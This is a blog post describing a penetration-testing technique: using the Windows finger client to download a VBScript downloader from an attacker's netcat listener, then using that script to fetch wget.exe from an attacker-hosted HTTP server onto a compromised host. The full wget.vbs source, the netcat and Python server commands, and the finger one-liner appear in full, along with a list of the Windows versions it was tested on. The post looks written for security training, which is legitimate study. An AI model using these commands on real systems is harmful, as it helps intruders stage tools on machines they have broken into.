Saturday, May 19, 2018

Use Finger To Download

Today I saw a twitter post by @DissectMalware about using finger to download data. I thought I would try it and see if I could find a good purpose for it (it is limited to textual data).

One annoying thing I find is when attempting to do file transfer on a Windows host that does not have a TFTP client or PowerShell. The solution is to paste in a 25 line VBScript. This wouldn't be so bad but usually I find I am restricted on a shell to pasting in at most 5 lines at a time and sometimes even less without corruption of the resulting script. The only way to know if the resulting script was successfully pasted is to type it out and examine all 25 lines (if they all made it into the file). Just running the script without knowing it is correct risks losing the shell. I have hung my shell more than once.

By the way don't bother trying the FTP client. The challenge is more than just that you have to create a script file so you can run it non-interactively. Besides having Windows Defender flag the FTP script file as malicious the FTP client on Windows does not work in passive mode. In other words it always trys to open a port for the returning data connection which pops up a GUI alert on Vista if the firewall is enabled and the user has not already chosen to allow this application etc..

The wget.vbs script:
strUrl = WScript.Arguments.Item(0)
StrFile = WScript.Arguments.Item(1)
Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0
Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0
Const HTTPREQUEST_PROXYSETTING_DIRECT = 1
Const HTTPREQUEST_PROXYSETTING_PROXY = 2
Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts
Err.Clear
Set http = Nothing
Set http = CreateObject("WinHttp.WinHttpRequest.5.1")
If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest")
If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP")
If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP")
http.Open "GET", strURL, False
http.Send
varByteArray = http.ResponseBody
Set http = Nothing
Set fs = CreateObject("Scripting.FileSystemObject")
Set ts = fs.CreateTextFile(StrFile, True)
strData = ""
strBuffer = ""
For lngCounter = 0 to UBound(varByteArray)
ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1)))
Next
ts.Close
POC
With this Proof Of Concept my goal is simply to download the wget.vbs script using finger and then use it to successfully download the wget.exe so that it can be used for further downloads.

The target has the firewall enabled:


On Kali:
Set up an HTTP listener someplace where the wget.exe file can be fetched:
cd /usr/share/windows-binaries/
python -m SimpleHTTPServer 80

Set up netcat to listen for a connection to the finger port and then push our wget.vbs script:
nc -lnvp 79 -q1 < wget.vbs

-q secs            quit after EOF on stdin and delay of secs

On Windows Vista 32bit:
Create or switch to a directory that your current user is permitted to create files in:
mkdir \temp
cd \temp


Download the script:
set HOSTIP=10.0.0.22
finger @%HOSTIP% >script.txt && more +2 script.txt >wget.vbs


Finger outputs a couple of lines before printing the script contents so we use "more" to strip those first 2 lines.

Use the downloaded script to fetch the wget.exe:
cscript wget.vbs http://%HOSTIP%/wget.exe wget.exe

We see that the downloaded wget.exe file is functional.

Tested now on default installs of:
Windows Server 2000
Windows XP SP1
Windows XP SP2
Windows 2003 Server
Windows Vista 32 bit
Windows Server 2008 Standard SP1 32bit
Windows 7 32 bit
Windows 7 64 bit
Windows 8 32 bit
Windows 8 64 bit
Windows Server 2012 R2
Windows 10 Pro 64 bit

The only issue so far was on Windows 2000, the finger process worked perfectly. The VBScript
had an error.

P.S.  @DissectMalware wanted to mention that it is possible to encode binary data, transfer it to the client and then decode it on the client. If you are taking the Offsec training one method of doing that suggests using debug.exe on the client to reassemble the executable.


No comments:

Post a Comment